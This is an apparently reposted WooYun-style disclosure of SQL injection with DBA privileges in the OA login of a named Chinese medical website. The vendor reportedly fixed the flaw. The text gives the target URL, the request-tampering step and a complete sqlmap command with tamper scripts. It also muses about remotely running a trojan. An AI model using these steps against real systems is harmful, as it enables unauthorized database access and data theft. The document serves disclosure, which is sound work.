神刀安全网

漏洞标题: 寻医问药某站SQL注入漏洞(DBA权限)

漏洞详情

披露状态:

2016-03-12: 细节已通知厂商并且等待厂商处理中
2016-03-13: 厂商已经确认,细节仅向厂商公开
2016-03-14: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

来给你们解释一下什么叫单恋,所谓单恋,就是你在心里判了我终审死刑,而我在心里判了你终身监禁!

详细说明:

漏洞地址:

http://oa.xywy.com/

漏洞标题:  寻医问药某站SQL注入漏洞(DBA权限)

我们来抓包,并修改用户名

漏洞标题:  寻医问药某站SQL注入漏洞(DBA权限)

然后丢入神器sqlmap

code 区域
sqlmap.py -r 4.txt --tamper space2comment.py,base64encode.py -p loginCode --level 5 --risk 3 --dbms mssql --

dbs

数据库

漏洞标题:  寻医问药某站SQL注入漏洞(DBA权限)

这权限看着舒服

漏洞标题:  寻医问药某站SQL注入漏洞(DBA权限)

看看ip

漏洞标题:  寻医问药某站SQL注入漏洞(DBA权限)

我勒个去,内网。。

好吧手里没服务器不然可以试试远程下载运行木马。。

还是看看表段

漏洞标题:  寻医问药某站SQL注入漏洞(DBA权限)

1000多,好吧,百度金和软件数据库字典也没找到登录的

审核大大

会有高分吗?会上首页吗?

漏洞证明:

漏洞地址:

http://oa.xywy.com/

漏洞标题:  寻医问药某站SQL注入漏洞(DBA权限)

我们来抓包,并修改用户名

漏洞标题:  寻医问药某站SQL注入漏洞(DBA权限)

然后丢入神器sqlmap

code 区域
sqlmap.py -r 4.txt --tamper space2comment.py,base64encode.py -p loginCode --level 5 --risk 3 --dbms mssql --

dbs

数据库

漏洞标题:  寻医问药某站SQL注入漏洞(DBA权限)

这权限看着舒服

漏洞标题:  寻医问药某站SQL注入漏洞(DBA权限)

看看ip

漏洞标题:  寻医问药某站SQL注入漏洞(DBA权限)

我勒个去,内网。。

好吧手里没服务器不然可以试试远程下载运行木马。。

还是看看表段

漏洞标题:  寻医问药某站SQL注入漏洞(DBA权限)

1000多,好吧,百度金和软件数据库字典也没找到登录的

审核大大

会有高分吗?会上首页吗?

修复方案:

你们更专业

版权声明:转载请注明来源 小豹@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 寻医问药某站SQL注入漏洞(DBA权限)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮